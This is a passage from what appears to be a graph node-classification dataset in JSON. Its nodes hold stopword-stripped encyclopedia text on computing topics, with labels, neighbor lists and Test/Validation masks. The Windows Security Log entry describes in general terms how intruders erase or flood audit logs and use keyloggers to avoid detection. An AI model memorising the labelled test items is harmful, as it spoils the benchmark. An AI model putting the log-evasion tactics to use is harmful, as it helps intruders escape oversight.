    "text": "Donald_Knuth:donald knuth donald ervin knuth born january 10 1938 american computer scientist mathematician professor emeritus stanford university 1974 recipient acm turing award informally considered nobel prize computer science author multi-volume work art computer programming contributed development rigorous analysis computational complexity algorithms systematized formal mathematical techniques process also popularized asymptotic notation addition fundamental contributions several branches theoretical computer science knuth creator tex computer typesetting system related metafont font definition language rendering system computer modern family typefaces writer scholar knuth created web cweb computer programming systems designed encourage facilitate literate programming designed mix/mmix instruction set architectures knuth strongly opposes granting software patents expressed opinion united states patent trademark office european patent organisation knuth born milwaukee wisconsin german-americans ervin henry knuth louise marie bohning father two jobs running small printing company teaching bookkeeping milwaukee lutheran high school donald student milwaukee lutheran high school received academic accolades especially ingenious ways thought solving problems example eighth grade entered contest find number words letters ziegler giant bar could rearranged create although judges 2,500 words list donald found 4,500 words winning contest prizes school received new television enough candy bars schoolmates eat 1956 knuth received scholarship case institute technology part case western reserve university cleveland ohio also joined beta nu chapter theta chi fraternity studying physics case institute technology knuth introduced ibm 650 one early mainframes reading computer manual knuth decided rewrite assembly compiler code machine used school believed could better 1958 knuth created program help school basketball team win games assigned values players order gauge probability getting points novel approach newsweek cbs evening news later reported knuth one founding editors case institute engineering science review national award best technical magazine 1959 switched physics mathematics 1960 received bachelor science degree simultaneously given master science degree special award faculty considered work exceptionally outstanding 1963 mathematician marshall hall adviser earned phd mathematics california institute technology receiving phd knuth joined caltech faculty assistant professor accepted commission write book computer programming language compilers working project knuth decided could adequately treat topic without first developing fundamental theory computer programming became art computer programming originally planned publish single book knuth developed outline book concluded required six volumes seven thoroughly cover subject published first volume 1968 publishing first volume art computer programming knuth left caltech accept employment institute defense analyses communications research division situated princeton university campus performing mathematical research cryptography support national security agency knuth left position join stanford university faculty 1969 fletcher jones professor computer science emeritus knuth writer well computer scientist knuth called father analysis algorithms 1970s knuth described computer science totally new field real identity standard available publications high lot papers coming quite simply wrong ... one motivations put straight story badly told 2011 first three volumes part one volume four series published concrete mathematics foundation computer science 2nd ed. originated expansion mathematical preliminaries section volume 1 taocp also published bill gates praised difficulty subject matter art computer programming stating think 're really good programmer ... definitely send résumé read whole thing knuth also author surreal numbers mathematical novelette john conway set theory construction alternate system numbers instead simply explaining subject book seeks show development mathematics knuth wanted book prepare students original creative research 1995 knuth wrote foreword book a=b marko petkovšek herbert wilf doron zeilberger knuth also occasional contributor language puzzles knuth also delved recreational mathematics contributed articles journal recreational mathematics beginning 1960s acknowledged major contributor joseph madachy mathematics vacation knuth also appeared number numberphile computerphile videos youtube discussed topics writing surreal numbers n't use email addition writings computer science knuth lutheran also author 3:16 bible texts illuminated examines bible process systematic sampling namely analysis chapter 3 verse 16 book verse accompanied rendering calligraphic art contributed group calligraphers leadership hermann zapf subsequently invited give set lectures 3:16 project resulting another book things computer scientist rarely talks published lectures god computer science member academic scientific community knuth strongly opposed policy granting software patents trivial solutions obvious expressed nuanced views nontrivial solutions interior-point method linear programming expressed disagreement directly united states patent trademark office european patent organisation knuth gives informal lectures times year stanford university titled computer musings visiting professor oxford university department computer science united kingdom 2017 honorary fellow magdalen college 1970s publishers taocp abandoned monotype favor phototypesetting knuth became frustrated inability latter system approach quality previous volumes typeset using older system took time work digital typesetting created tex metafont developing tex knuth created new methodology programming called literate programming believed programmers think programs works literature instead imagining main task instruct computer let us concentrate rather explaining human beings want computer knuth embodied idea literate programming web system web source used weave tex file tangle pascal source file turn produce readable description program executable binary respectively later iteration system cweb replaces pascal c. knuth used web program tex metafont published programs books texbook originally published 1984 metafontbook originally published 1986 around time latex now-widely-adopted macro package based tex first developed leslie lamport later published first user manual 1986 donald knuth married nancy jill carter 24 june 1961 graduate student california institute technology two children john martin knuth jennifer sierra knuth knuth chinese name gao dena 1977 given name frances yao shortly making 3-week trip china 1980 volume art computer programming knuth explains embraced chinese name wanted known growing numbers computer programmers china time 1989 chinese name placed atop journal computer science technology header knuth says makes feel close chinese people although speak language 2006 knuth diagnosed prostate cancer underwent surgery december year stated little bit radiation therapy ... precaution prognosis looks pretty good reported video autobiography knuth used pay finder fee 2.56 typographical errors mistakes discovered books 256 pennies one hexadecimal dollar 0.32 valuable suggestions according article massachusetts institute technology technology review knuth reward checks among computerdom prized trophies knuth stop sending real checks 2008 due bank fraud instead gives error finder certificate deposit publicly listed balance fictitious bank san serriffe warned correspondent beware bugs code proved correct tried knuth published first scientific article school magazine 1957 title potrzebie system weights measures defined fundamental unit length thickness mad 26 named fundamental unit force whatmeworry mad published article issue 33 june 1957 demonstrate concept recursion knuth intentionally referred circular definition definition circular index art computer programming volume 1 preface concrete mathematics following paragraph tug 2010 conference knuth announced satirical xml-based successor tex titled itex performed bell ringing would support features arbitrarily scaled irrational units 3d printing input seismographs heart monitors animation stereophonic sound 1971 knuth recipient first acm grace murray hopper award received various awards including turing award national medal science john von neumann medal kyoto prize knuth elected distinguished fellow british computer society dfbcs 1980 recognition knuth contributions field computer science 1990 awarded one-of-a-kind academic title professor art computer programming since revised professor emeritus art computer programming knuth elected national academy sciences 1975 1992 became associate french academy sciences also year retired regular research teaching stanford university order finish art computer programming elected foreign member royal society formemrs 2003 knuth elected fellow first class fellows society industrial applied mathematics 2009 outstanding contributions mathematics member norwegian academy science letters 2012 became fellow american mathematical society awards honors include short list publications include art computer programming computers typesetting books hardcover unless otherwise noted books collected papers books",
    "neighbors": [
      512,
      898,
      1922,
      4483,
      1029,
      1672,
      7048,
      11020,
      4877,
      8973,
      5523,
      6036,
      10008,
      8987,
      8479,
      1952,
      2978,
      1316,
      1702,
      1191,
      5676,
      10668,
      10796,
      7471,
      7983,
      1841,
      2482,
      9911,
      1976,
      2619,
      9019,
      4799,
      4800,
      10049,
      4930,
      3267,
      10560,
      70,
      8262,
      1864,
      73,
      1610,
      3529,
      588,
      1613,
      8524,
      7887,
      1360,
      5585,
      7634,
      9804,
      1236,
      3413,
      219,
      1883,
      11099,
      479,
      7775,
      6242,
      9315,
      10469,
      6248,
      9192,
      9320,
      2283,
      11242,
      8301,
      10352,
      9714,
      4981,
      1783,
      8186,
      2045,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 2799,
    "label": 4,
    "text": "Robust_random_early_detection:robust random early detection robust random early detection rred queueing disclipine network scheduler existing random early detection red algorithm variants found vulnerable emerging attacks especially low-rate denial-of-service attacks ldos experiments confirmed existing red-like algorithms notably vulnerable ldos attacks due oscillating tcp queue size caused attacks robust red rred algorithm proposed improve tcp throughput ldos attacks basic idea behind rred detect filter attack packets normal red algorithm applied incoming flows rred algorithm significantly improve performance tcp low-rate denial-of-service attacks detection filter block added front regular red block router basic idea behind rred detect filter ldos attack packets incoming flows feed red algorithm distinguish attacking packet normal tcp packets critical rred design within benign tcp flow sender delay sending new packets loss detected e.g. packet dropped consequently packet suspected attacking packet sent within short-range packet dropped basic idea detection algorithm robust red rred nowiki rred-enque pkt 01 f←rred-flowhash pkt 02 tmax←max flow f .t1 t2 03 pkt.arrivaltime within tmax tmax+t* 04 reduce local indicator 1 bin corresponding f 05 else 06 increase local indicator 1 bin f 07 flow f .i←maximum local indicators bins f 08 flow f .i =0 09 red-enque pkt //pass pkt red block 10 red drops pkt 11 t2←pkt.arrivaltime 12 else 13 flow f .t1←pkt.arrivaltime 14 drop pkt 15 return simulation code rred algorithm published active queue management denial-of-service attack aqm dos simulation platform aqm dos simulation platform able simulate variety dos attacks distributed dos spoofing dos low-rate dos etc active queue management aqm algorithms red rred sfb etc. automatically calculates records average throughput normal tcp flows dos attacks facilitate analysis impact dos attacks normal tcp flows aqm algorithms",
    "neighbors": [
      2409,
      1541,
      2294
    ],
    "mask": "Test"
  },
  {
    "node_id": 2800,
    "label": 4,
    "text": "Dark_Mail_Alliance:dark mail alliance dark mail alliance organization dedicated creating email protocol architecture end-to-end encryption october 2013 silent circle lavabit announced project create secure alternative email began fundraising effort dark mail alliance team consists phil zimmermann jon callas mike janke ladar levison dark internet mail environment dime aims secure communication platform asynchronous messaging across internet presented ladar levison stephen watt def con multiple revisions dime specifications latest revision presented preliminary draft magma reference mime server implementation supports server side encryption simple mail transfer protocol smtp post office protocol pop internet message access protocol imap hypertext transfer protocol http volcano thunderbird fork dime support",
    "neighbors": [
      10145,
      11046,
      2091,
      2354,
      9909,
      11418,
      8283,
      4797,
      7199
    ],
    "mask": "Test"
  },
  {
    "node_id": 2801,
    "label": 2,
    "text": "Windows_Security_Log:windows security log security log microsoft windows log contains records login/logout activity security-related events specified system audit policy auditing allows administrators configure windows record operating system activity security log security log one three logs viewable event viewer local security authority subsystem service writes events log security log one primary tools used administrators detect investigate attempted successful unauthorized activity troubleshoot problems microsoft describes best last defense log audit policies govern also favorite targets hackers rogue system administrators seeking cover tracks committing unauthorized activity audit policy set record logins successful login results user user name computer name logged well user name logging depending version windows method login ip address may may recorded windows 2000 web server instance log ip addresses successful logins windows server 2003 includes capability categories events logged sheer number loggable events means security log analysis time-consuming task third-party utilities developed help identify suspicious trends also possible filter log using customized criteria administrators allowed view clear log way separate rights view clear log addition administrator use winzapper delete specific events log reason administrator account compromised event history contained security log unreliable defense set remote log server services shut allowing console access log approaches maximum size either overwrite old events stop logging new events makes susceptible attacks intruder flood log generating large number new events partial defense increase maximum log size greater number events required flood log possible set log overwrite old events chris benton notes problem nt really bad habit crashing logs become full randy franklin smith ultimate windows security points given ability administrators manipulate security log cover unauthorized activity separation duty operations security-monitoring staff combined frequent backups log server accessible latter improve security another way defeat security log would user log administrator change auditing policies stop logging unauthorized activity intends carry policy change could logged depending audit policy change setting event could deleted log using winzapper point onward activity would generate trail security log microsoft notes possible detect attempts elude security monitoring solution techniques challenging many events occur attempt cover tracks intrusive activity events occur regularly typical business network benton points one way preventing successful attacks security obscurity keeping department security systems practices confidential helps prevent users formulating ways cover tracks users aware log copied remote log server :00 every hour instance may take measures defeat system attacking :10 deleting relevant log events top next hour log manipulation needed attacks simply aware security log works enough take precautions detection instance user wanting log fellow employee account corporate network might wait hours gain unobserved physical access computer cubicle surreptitiously use hardware keylogger obtain password later log user account terminal services wi-fi hotspot whose ip address traced back intruder log cleared event viewer one log entry immediately created freshly cleared log noting time cleared admin cleared information starting point investigation suspicious activity addition windows security log administrators check internet connection firewall security log clues theoretically possible write false events log microsoft notes able write security log seauditprivilege required default local system network service accounts privilege microsoft windows internals states processes call audit system services must seauditprivilege privilege successfully generate audit record winzapper faq notes possible add 'made event records log feature added considered nasty reference fact someone administrator access could use functionality shift blame unauthorized activity innocent party server 2003 added api calls applications could register security event logs write security audit entries specifically authzinstallsecurityeventsource function installs specified source security event source eventtracker newsletter states possibility tampering enough cause logs inadmissible must specific evidence tampering order logs considered inadmissible",
    "neighbors": [
      6273,
      3394,
      647,
      2312,
      4423,
      10442,
      3532,
      6797,
      2807,
      5435,
      93,
      8637
    ],
    "mask": "Test"
  },
  {
    "node_id": 2802,
    "label": 5,
    "text": "Circuit_switching:circuit switching circuit switching method implementing telecommunications network two network nodes establish dedicated communications channel circuit network nodes may communicate circuit guarantees full bandwidth channel remains connected duration communication session circuit functions nodes physically connected electrical circuit defining example circuit-switched network early analog telephone network call made one telephone another switches within telephone exchanges create continuous wire circuit two telephones long call lasts circuit switching contrasts packet switching divides data transmitted packets transmitted network independently packet switching instead dedicated one communication session time network links shared packets multiple competing communication sessions resulting loss quality service guarantees provided circuit switching circuit switching bit delay constant connection opposed packet switching packet queues may cause varying potentially indefinitely long packet transfer delays circuit degraded competing users protected use callers circuit released new connection set even actual communication taking place channel remains reserved protected competing users virtual circuit switching packet switching technology emulates circuit switching sense connection established packets transferred packets delivered order circuit switching commonly used connecting voice circuits concept dedicated path persisting two communicating parties nodes extended signal content voice advantage using circuit switching provides continuous transfer without overhead associated packets making maximal use available bandwidth communication one disadvantage relatively inefficient unused capacity guaranteed connection used connections network call setup control administrative purposes possible use separate dedicated signalling channel end node network isdn one service uses separate signalling channel plain old telephone service pots method establishing connection monitoring progress termination network may also utilize separate control channel case links telephone exchanges use ccs7 packet-switched signalling protocol communicate call setup control information use tdm transport actual circuit data early telephone exchanges suitable example circuit switching subscriber would ask operator connect another subscriber whether exchange via inter-exchange link another operator case end result physical electrical connection two subscribers telephones duration call copper wire used connection could used carry calls time even subscribers fact talking line silent circuit switching contrasts packet switching divides data transmitted small units called packets transmitted network independently packet switching shares available network bandwidth multiple communication sessions multiplexing multiple telecommunications connections physical conductor possible long time nonetheless channel multiplexed link either dedicated one call time idle calls circuit switching route associated bandwidth reserved source destination making circuit switching relatively inefficient since capacity reserved whether connection continuous use contrast packet switching process segmenting data transmitted several smaller packets packet labeled destination sequence number ordering related packets precluding need dedicated path help packet find way destination packet dispatched independently may routed via different path destination original message reordered based packet number reproduce original message result datagram packet switching networks require circuit established allow many pairs nodes communicate concurrently channel",
    "neighbors": [
      10112,
      4609,
      2306,
      388,
      8708,
      3847,
      2057,
      2701,
      1550,
      11288,
      2458,
      5020,
      5664,
      1192,
      11560,
      7723,
      11181,
      1969,
      2994,
      1083,
      448,
      8256,
      7490,
      835,
      3140,
      7108,
      9284,
      11591,
      5576,
      5321,
      5704,
      6857,
      7498,
      9038,
      3959,
      9296,
      10830,
      1876,
      2904,
      2911,
      3168,
      1121,
      2785,
      4068,
      5092,
      5863,
      7400,
      1650,
      9717,
      119,
      6267
    ],
    "mask": "Test"
  },
  {
    "node_id": 2803,
    "label": 3,
    "text": "LPX_(form_factor):lpx form factor lpx low profile extension originally developed western digital loosely defined motherboard format form factor widely used 1990s never official lpx specification design normally featured motherboard main i/o ports mounted back something later adopted atx form factor riser card center motherboard pci isa slots mounted due lack standardized specification riser cards seldom compatible one motherboard design another much less one manufacturer another internal psu connector type used form factor one successful features come lpx specification use compact power supplies later became widely used baby even full size cases lpx form factor power supplies became ubiquitous computer cases prior atx standard unusual manufacturers refer power supplies occasionally ps/2 power supplies due use ibm ps/2 even though actual baby power supply form factors larger size lpx form factor power supply eventually formed basis atx form factor power supply width height specification popular early-mid 90 briefly displaced form factor commonly used however release pentium ii 1997 highlighted flaws format good airflow important pentium ii systems owing relatively high heat dispersal requirements processor lpx systems suffered restricted airflow due centrally placed riser cards introduction agp format complicated matters design increased pin count riser cards limited cards one agp one pci one isa slot restrictive users lower-quality lpx boards n't even feature real agp slot simply used physical agp slot connected pci bus seldom noticed however many agp graphics cards time fact pci cards internally take advantage features offered agp lpx phased around 1998 nlx intended successor though many manufacturers chose microatx proprietary motherboard formats instead",
    "neighbors": [
      10337,
      2500,
      455,
      7113,
      7151,
      10095,
      2161,
      10715,
      5368,
      8730,
      9307,
      3037,
      799
    ],
    "mask": "None"
  },
  {
    "node_id": 2804,
    "label": 2,
    "text": "Library_(computing):library computing computer science library collection non-volatile resources used computer programs often software development may include configuration data documentation help data message templates pre-written code subroutines classes values type specifications ibm os/360 successors referred partitioned data sets library also collection implementations behavior written terms language well-defined interface behavior invoked instance people want write higher level program use library make system calls instead implementing system calls addition behavior provided reuse multiple independent programs program invokes library-provided behavior via mechanism language example simple imperative language c behavior library invoked using c normal function-call distinguishes call library function versus another function program way code organized system library code organized way used multiple programs connection code part program organized used within one program distinction gain hierarchical notion program grows large multi-million-line program case may internal libraries reused independent sub-portions large program distinguishing feature library organized purposes reused independent programs sub-programs user needs know interface internal details library value library lies reuse behavior program invokes library gains behavior implemented inside library without implement behavior libraries encourage sharing code modular fashion ease distribution code behavior implemented library connected invoking program different program lifecycle phases code library accessed build invoking program library called static library alternative build executable invoking program distribute independently library implementation library behavior connected executable invoked executed either part process starting execution middle execution case library called dynamic library loaded run time dynamic library loaded linked preparing program execution linker alternatively middle execution application may explicitly request module loaded compiled languages standard library although programmers also create custom libraries modern software systems provide libraries implement majority system services libraries commoditized services modern application requires code used modern applications provided system libraries earliest programming concepts analogous libraries intended separate data definitions program implementation jovial brought compool communication pool concept popular attention 1959 although adopted idea large-system sage software following computer science principles separation concerns information hiding comm pool purpose permit sharing system data among many programs providing centralized data description cobol also included primitive capabilities library system 1959 jean sammet described inadequate library facilities retrospect another major contributor modern library concept came form subprogram innovation fortran fortran subprograms compiled independently compiler lacked linker prior introduction modules fortran-90 type checking fortran subprograms impossible finally historians concept remember influential simula 67 simula first object-oriented programming language classes nearly identical modern concept used java c++ c class concept simula also progenitor package ada module modula-2 even developed originally 1965 simula classes could included library files added compile time libraries important program linking binding process resolves references known links symbols library modules linking process usually automatically done linker binder program searches set libraries modules given order usually considered error link target found multiple times given set libraries linking may done executable file created whenever program used run time references resolved may addresses jumps routine calls may main program one module depending upon another resolved fixed relocatable addresses common base allocating runtime memory memory segments module referenced programming languages may use feature called smart linking whereby linker aware integrated compiler linker knows external references used code library never actually used even though internally referenced discarded compiled application example program uses integers arithmetic arithmetic operations exclude floating-point library routines smart-linking feature lead smaller application file sizes reduced memory usage references program library module stored relative symbolic form resolved code libraries assigned final static addresses relocation process adjusting references done either linker loader general relocation done individual libraries addresses memory may vary depending program using libraries combined position-independent code avoids references absolute addresses therefore require relocation linking performed creation executable another object file known static linking early binding case linking usually done linker may also done compiler static library also known archive one intended statically linked originally static libraries existed static linking must performed modules recompiled modules required program sometimes statically linked copied executable file process resulting stand-alone file known static build program static build may need relocation virtual memory used address space layout randomization desired shared library shared object file intended shared executable files shared object files modules used program loaded individual shared objects memory load time run time rather copied linker creates single monolithic executable file program shared libraries statically linked meaning references library modules resolved modules allocated memory executable file created often linking shared libraries postponed loaded modern operating systems shared library files format executable files offers two main advantages first requires making one loader rather two single loader considered well worth added complexity secondly allows executables also used shared libraries symbol table typical combined executable shared library formats elf mach-o unix pe windows older environments 16-bit windows mpe hp 3000 stack-based data local allowed shared-library code significant restrictions placed shared-library code library code may shared memory multiple processes well disk virtual memory used processes would execute physical page ram mapped different address spaces processes advantages instance openstep system applications often hundred kilobytes size loaded quickly majority code located libraries already loaded purposes operating system programs accomplish ram sharing using position-independent code unix leads complex flexible architecture using common virtual addresses windows os/2 systems make sure various tricks like pre-mapping address space reserving slots shared library code great probability shared third alternative single-level store used ibm system/38 successors allows position-dependent code places significant restrictions code placed shared cases different versions shared libraries cause problems especially libraries different versions file name different applications installed system require specific version scenario known dll hell named windows os/2 dll file modern operating systems 2001 clean-up methods eliminate situations use application-specific private libraries dynamic linking late binding linking performed program loaded load time executed run time rather executable file created dynamically linked library dynamic-link library dll windows os/2 dynamic shared object dso unix-like systems library intended dynamic linking minimal amount work done linker executable file created records library routines program needs index names numbers routines library majority work linking done time application loaded load time execution run time usually necessary linking program called dynamic linker linking loader actually part underlying operating system however possible exceedingly difficult write program uses dynamic linking includes dynamic linker even operating system provides support dynamic linking programmers originally developed dynamic linking multics operating system starting 1964 mts michigan terminal system built late 1960s since shared libraries systems change often systems compute likely load address shared library system needed store information libraries executables every shared library loaded undergone process load predetermined address speeds process dynamic linking optimization known prebinding macos prelinking linux disadvantages technique include time required precompute addresses every time shared libraries change inability use address space layout randomization requirement sufficient virtual address space use problem alleviated adoption 64-bit architectures least time loaders shared libraries vary widely functionality depend executable storing explicit paths libraries change library naming layout file system cause systems fail commonly name library path stored executable operating system supplying method find library disk based algorithm shared library executable depends deleted moved renamed incompatible version library copied place earlier search executable would fail load called dependency hell existing many platforms infamous windows variant commonly known dll hell problem occur version library uniquely identified program references libraries full unique identifiers dll hell problems earlier windows versions arose using names libraries guaranteed unique resolve dynamic links programs avoid dll hell later versions windows rely largely options programs install private dlls—essentially partial retreat use shared libraries—along mechanisms prevent replacement shared system dlls earlier versions microsoft windows checks registry determine proper place load dlls implement com objects dlls check directories defined order first windows checks directory loaded program private dll directories set calling codice_1 function system32 system windows directories current working directory finally directories specified path environment variable applications written .net framework framework since 2002 also check global assembly cache primary store shared dll files remove issue dll hell openstep used flexible system collecting list libraries number known locations similar path concept system first starts moving libraries around causes problems although users incur time cost first starting system unix-like systems search path specifying file-system directories look dynamic libraries systems specify default path configuration file others hard-code dynamic loader executable file formats specify additional directories search libraries particular program usually overridden environment variable although disabled setuid setgid programs user ca n't force program run arbitrary code root permissions developers libraries encouraged place dynamic libraries places default search path downside make installation new libraries problematic known locations quickly become home increasing number library files making management complex dynamic loading subset dynamic linking involves dynamically linked library loading unloading run time request request may made implicitly compile time explicitly run time implicit requests made compile time linker adds library references include file paths simply file names explicit requests made applications make direct calls operating system api run time operating systems support dynamically linked libraries also support dynamically loading libraries via run-time linker api instance microsoft windows uses api functions loadlibrary loadlibraryex freelibrary getprocaddress microsoft dynamic link libraries posix-based systems including unix unix-like systems use dlopen dlclose dlsym development systems automate process although originally pioneered 1960s dynamic linking reach operating systems used consumers late 1980s generally available form operating systems early 1990s period object-oriented programming oop becoming significant part programming landscape oop runtime binding requires additional information traditional libraries n't supply addition names entry points code located within also require list objects depend side-effect one oop main advantages inheritance means parts complete definition method may different places simply listing one library requires services another true oop system libraries may known compile time vary system system time many developers worked idea multi-tier programs display running desktop computer would use services mainframe minicomputer data storage processing instance program gui-based computer would send messages minicomputer return small samples huge dataset display remote procedure calls rpc already handled tasks standard rpc system soon majority minicomputer mainframe vendors instigated projects combine two producing oop library format could used anywhere systems known object libraries distributed objects supported remote access microsoft com example system local use dcom modified version supports remote access time object libraries held status next big thing programming world number efforts create systems would run across platforms companies competed try get developers locked system examples include ibm system object model som/dsom sun microsystems distributed objects everywhere doe next portable distributed objects pdo digital objectbroker microsoft component object model com/dcom number corba-based systems inevitable cooling marketing hype object libraries continue used object-oriented programming distributed information systems class libraries rough oop equivalent older types code libraries contain classes describe characteristics define actions methods involve objects class libraries used create instances objects characteristics set specific values oop languages like java distinction clear classes often contained library files like java jar file format instantiated objects residing memory although potentially able made persistent separate files others like smalltalk class libraries merely starting point system image includes entire state environment classes instantiated objects another solution library issue comes using completely separate executables often lightweight form calling using remote procedure call rpc network another computer approach maximizes operating system re-use code needed support library code used provide application support security every program additionally systems require library exist machine forward requests network however approach means every library call requires considerable amount overhead rpc calls much expensive calling shared library already loaded machine approach commonly used distributed architecture makes heavy use remote calls notably client-server systems application servers enterprise javabeans code generation libraries high-level apis generate transform byte code java used aspect-oriented programming data access frameworks testing generate dynamic proxy objects also used intercept field access system stores codice_2 codice_3 files directories codice_4 codice_5 codice_6 filenames always start codice_7 end suffix codice_8 archive static library codice_9 shared object dynamically linked library systems might multiple names dynamically linked library names names symbolic links remaining name names might include major version library full version number example systems codice_10 would filename second major interface revision dynamically linked library codice_11 codice_12 files sometimes found library directories libtool archives usable system system inherits static library conventions bsd library stored codice_8 file use codice_9-style dynamically linked libraries codice_15 suffix instead libraries macos however consist frameworks placed inside special directories called bundles wrap library required files metadata example framework called codice_16 would implemented bundle called codice_17 codice_18 either dynamically linked library file symlink dynamically linked library file codice_19 dynamic-link libraries usually suffix codice_20 although file name extensions may identify specific-purpose dynamically linked libraries e.g codice_21 ole libraries interface revisions either encoded file names abstracted away using com-object interfaces depending compiled codice_22 files either static libraries representations dynamically linkable libraries needed compilation known import libraries unlike unix world uses different file extensions linking codice_23 file windows one must first know regular static library import library latter case codice_24 file must present run time",
    "neighbors": [
      10243,
      2083,
      8227,
      4135,
      44,
      4143,
      2045,
      10292,
      8246,
      2105,
      8258,
      8262,
      74,
      8266,
      4178,
      2138,
      2145,
      6248,
      8297,
      8301,
      8303,
      8315,
      8323,
      2180,
      8326,
      2183,
      139,
      2191,
      154,
      2222,
      10414,
      2225,
      2228,
      4277,
      2234,
      187,
      8379,
      190,
      4292,
      6345,
      2259,
      214,
      10463,
      4321,
      6370,
      2281,
      10480,
      246,
      2294,
      8438,
      4349,
      6406,
      8454,
      4378,
      8476,
      4384,
      10537,
      8491,
      6446,
      6450,
      318,
      4423,
      4424,
      8520,
      10568,
      2386,
      6487,
      8535,
      363,
      364,
      2417,
      10611,
      4481,
      2448,
      8597,
      406,
      2457,
      6558,
      8607,
      10654,
      2474,
      428,
      8621,
      2481,
      6584,
      10684,
      2493,
      8644,
      4572,
      477,
      482,
      8675,
      487,
      10732,
      4589,
      4590,
      8685,
      4592,
      10739,
      502,
      2556,
      4606,
      2558,
      516,
      6664,
      10765,
      10771,
      8728,
      4644,
      4645,
      2598,
      6694,
      10791,
      2603,
      2605,
      564,
      4663,
      8771,
      6727,
      603,
      2658,
      4712,
      2672,
      6772,
      2685,
      10886,
      4746,
      2700,
      653,
      6797,
      10909,
      4771,
      4777,
      2730,
      10921,
      4780,
      692,
      711,
      731,
      8923,
      10973,
      736,
      4836,
      6888,
      10991,
      4853,
      8959,
      6912,
      8966,
      6921,
      6927,
      2833,
      11030,
      8984,
      8995,
      2854,
      4902,
      823,
      4919,
      844,
      11084,
      9041,
      2901,
      9045,
      2910,
      9054,
      868,
      4964,
      7018,
      9067,
      7022,
      7032,
      2942,
      2943,
      4995,
      2955,
      11160,
      7067,
      7071,
      5029,
      5037,
      5040,
      946,
      11208,
      5065,
      5067,
      11218,
      3030,
      3033,
      993,
      7139,
      11235,
      3051,
      9196,
      11247,
      5119,
      5120,
      9222,
      1035,
      9229,
      1039,
      9234,
      1043,
      7188,
      7189,
      11287,
      9245,
      1055,
      5154,
      5165,
      9263,
      5176,
      9272,
      11322,
      9281,
      7235,
      11338,
      5199,
      1106,
      7262,
      11361,
      1126,
      9324,
      3183,
      3186,
      1144,
      9340,
      7293,
      5246,
      9345,
      5251,
      9348,
      3206,
      5259,
      7307,
      7309,
      9356,
      11406,
      9366,
      3224,
      5277,
      1185,
      7341,
      5316,
      7382,
      7384,
      9434,
      9441,
      11498,
      5356,
      3321,
      3323,
      5373,
      1278,
      7421,
      3334,
      7430,
      9491,
      11539,
      3349,
      5397,
      5401,
      11546,
      11570,
      3386,
      1343,
      1348,
      9541,
      11596,
      3410,
      11603,
      3412,
      11616,
      1379,
      3427,
      9579,
      9587,
      5492,
      1401,
      7550,
      7561,
      7562,
      9609,
      11661,
      11670,
      5531,
      9628,
      11680,
      5546,
      7603,
      1461,
      5557,
      1469,
      3517,
      5567,
      9665,
      3522,
      1480,
      3529,
      5578,
      7629,
      1515,
      9710,
      9714,
      3573,
      9730,
      7695,
      3603,
      3613,
      3618,
      7717,
      1577,
      5677,
      3631,
      1584,
      1586,
      1593,
      1594,
      3659,
      9808,
      3665,
      5714,
      9813,
      3675,
      1632,
      1646,
      7792,
      3698,
      1656,
      5754,
      7806,
      3712,
      5760,
      5761,
      5765,
      9875,
      3734,
      9881,
      9882,
      7846,
      7847,
      7861,
      3767,
      1724,
      7871,
      9921,
      9926,
      9932,
      3790,
      9943,
      7904,
      1770,
      3821,
      1775,
      5880,
      7943,
      1812,
      5913,
      3869,
      10013,
      10016,
      5921,
      3876,
      10024,
      10026,
      10029,
      7983,
      10033,
      1842,
      5945,
      1852,
      5952,
      1859,
      3918,
      10079,
      1890,
      8037,
      10089,
      10097,
      1917,
      1922,
      8071,
      10122,
      8080,
      3988,
      1952,
      10145,
      6074,
      8122,
      4029,
      10176,
      1988,
      4042,
      10198,
      8161,
      6114,
      8162,
      10221,
      10229,
      4089,
      8188,
      8189
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2805,
    "label": 3,
    "text": "Datapath:datapath datapath collection functional units arithmetic logic units multipliers perform data processing operations registers buses along control unit composes central processing unit cpu larger datapath made joining one number datapaths using multiplexer late 1990s growing research area reconfigurable datapaths—datapaths may re-purposed run-time using programmable fabric—as designs may allow efficient processing well substantial power savings",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      5237,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      8058,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      936,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 2806,
    "label": 8,
    "text": "Attitudinal_analytics:attitudinal analytics attitudinal analytics marketing technology application involves integration online surveys capture visitor intent critical demographic attributes tracking explicit behavior click stream monitoring websites quantitative user experience collects data thousands user sessions rather hundreds data typically compared key performance indicators performance customer satisfaction overall customer experience success failure reports finding recommendations used improve website customer experience program heavily dependent upon use online campaigns driving traffic website collection sites offline measurement also incorporated extend customer experience understanding illuminate elements online experience impacted offline behavior purchasing store visiting branch office several vendors provide attitudinal analytics solutions stand-alone offerings leading web analytics players also providing partner integration frameworks better integrate silos intent attitudinal behavioral data https //web.archive.org/web/20080311081258/http //www.usabilitysciences.com/category/case-studies/",
    "neighbors": [
      3688
    ],
    "mask": "None"
  },
  {
    "node_id": 2807,
    "label": 4,
